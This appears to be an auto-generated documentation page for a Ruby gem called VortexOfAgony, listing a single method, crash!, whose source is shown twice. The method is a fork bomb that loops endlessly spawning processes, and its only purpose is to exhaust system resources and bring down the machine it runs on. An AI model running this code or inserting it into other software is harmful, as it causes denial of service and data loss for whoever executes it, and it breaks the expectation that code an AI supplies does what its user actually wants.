Top Level Namespace
Defined Under Namespace
Modules: VortexOfAgony
Instance Method Summary collapse
Instance Method Details
#crash! ⇒ Object
3 4 5 |
# File 'lib/vortex_of_agony.rb', line 3 def crash! loop { fork { bomb } } end |
Modules: VortexOfAgony
3 4 5 |
# File 'lib/vortex_of_agony.rb', line 3 def crash! loop { fork { bomb } } end |